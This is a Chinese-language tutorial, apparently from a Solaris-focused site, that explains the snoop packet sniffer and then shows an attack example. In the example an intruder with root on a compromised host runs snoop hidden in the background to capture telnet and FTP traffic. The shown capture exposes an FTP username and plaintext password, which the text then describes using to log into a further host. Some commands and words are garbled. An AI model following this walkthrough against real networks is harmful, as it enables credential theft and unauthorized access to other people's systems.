solaris系统:在Solaris系统中的sniffer攻击例子

1.Snoop介绍

在Solaris系统中有个默认安装Snfer软件Software叫做Snoop所以没有必要重新安装其他Snfer了可以直接使用Snoop来进行嗅探下面简要介绍下Snoop使用思路方法

Snoop 是个命令行软件Software它使用思路方法为:Snoop［选项］［过滤条］

其中选项包括:

［-a］＃ 在 audio上监听

［-d device］＃ 设置监听设备

［-s snaplen］＃ 将包截短

［-c count］＃设置捕获包数量

［-P］＃关闭混杂模式

［-D］＃ 报告掉包

［-S］＃报告包大小

［-i file］＃从文件读人记录

［-o file］＃把捕获情况存人文件

［-n flle］＃从文件读人域名表

［-N］＃ 创建域名表

［-t r|a|d］＃设置时间可以为相对或绝对时间

［-v］＃详细包信息显示

［-V］＃显示所有包信息

［-p first[,last] ］＃显示指定包

［-x off[length] ］＃ 显示 16进制数据

［-C］＃ 显示包过滤码

其中最常用选项是-o和-c通过o选项可以把捕获情况输出到个文件中否则会显示在屏幕上通过-c可以设置要捕获包数量否则就会无限制地捕获传输包

Snoop重点在于设置过滤条件所谓过滤条件就是我们要捕获什么样包以太网上传输数据量般是相当大所以不能捕获所有传输包否则会无法找到我们要信息于是我们就设置个过滤条件只捕获我们要包例如含有密码包

过滤条件主要包括from、to、net和 port其中from是指从特定主机发送过来包to是指发送到特定主机包net是来自或发往特定网络包port是指来自或发往特定端口包这些过滤条件可以通过and(且关系)、or(或关系)和not(非关系)来进行组合例如下面Snoop命令捕获所有来自192．168．3．12地址DNS和NFS包:

snoop from 192.168.3.12 port do　or rpc nfs

2．SnooP攻击例子

假设我们已经通过某种思路方法成功攻人了Solaris主机 202．11．22．33(本文隐藏了实际IP地址下同)并且获得这台主机上最高root权限那么现在我们就可以在这台主机上使用Snoop来嗅探此同段上传输密码

首先我们使用find命令查找下此主机上Snoop安装在哪里:

＃find／-name snoop -pr

／usr／sbin／snoop

我们目是捕获网络上传输密码所以我们要设置Snoop过滤选项来捕获网络上所有 telnet和 ftp包使用下面命令:

#nohup /usr/sbin/snoop -o slog -c 10000 port

telnet or port ftp&

我们使用nohup和&来把Snoop挂在后台运行这样当我们从终端退出时候Snoop仍然可以在后台运行并且我们使用-o把嗅探结果保存在文件slog里使用-c选项来设置共捕获10000个包以免捕获数据量太大而占据硬盘空间port telnet or ftp就是过滤选项它设置只捕获Telnet和FTP包这两种协议都使用密码验证而且密码不加密

然后我们就可以退出登录第 2天再次登录上这台主机可以看到当前目录下有个slog文件这就是嗅探结果但是要注意这个文件不是文本文件不能使用cat命令直接查看必须用Snoop-i选项来查看使用如下命令:

#/usr/sbin/snoop -i slog |more

这里我们使用more来点点查看发现 输出中有以下片段:

gi-12-107.bta.net.cn->202.11.22.68 FTP C port=1924

202.11.22.68->gi-12-107.bta.net.cn FTP R POrt=1924

gi-12-107.bta.net.cn->202.11.22.68 FTP C POrt=1924

202.11.22.68->gi-12-107.bta.net.cn FTP R POrt=1924

220 202.11.22.68

gi-12-107.bta.net.cn->202.11.22.68 FTP C port=1924

gi-12-107.bta.net.cn->202.11.22.68 FTP C port=1924

USER bode\r\n

202.11.22.68->gi-12-107.bta.net.cn FTP R POrt=1924

202.11.22.68->gi-12-107.bta.net.cn FTP R POrt=1924

331 Password require

gi-12-107.bta.net.cn->202.11.22.68 FTP C port=1924

gi-12-107.bta.net.cn->202.11.22.68 FTP C port=1924

PASS zhangjm\r\n

202.11.22.68->gi-12-107.bta.net.cn FTP R POrt=1924

202.11.22.68->gi-12-107.bta.net.cn FTP R POrt=1924

230 user bode logged

gi-12-107.bta.net.cn->202.11.22.68 FTP C port=1924

通过上面记录我们可以看到来自gi-12-107.bta.net.cn用户使用 FTP登录上了202.11.22.68主机它使用用户名为bode密码为zhangjm于是我们就可以使用这个用户名和密码来登录上202.11.22.68了

延伸阅读

• 2009-9-12-- solaris系统时间:Solaris  系统安全加固列表
• 2008-12-4-- solaris系统:如何使用 Solaris的系统帮助
• 2009-9-2-- solaris系统:Solaris 系统安全加固列表
• 2008-12-4-- solaris系统:保护SUN Solaris系统安全
• 2008-12-4-- solaris系统:Solaris 的 Profile 权限控制系统初探
• 2008-12-4-- solaris系统:谈谈Solaris系统性能上的维护
• 2009-2-12-- solaris系统管理:用软件包命令管理Solaris软件系统
• 2009-2-12-- solaris文件系统:Solaris文件系统分区建议
• 2009-9-29-- solaris是什么系统:Solaris 系统安全加固列表
• 2009-2-12-- solaris系统:Solaris 系统维护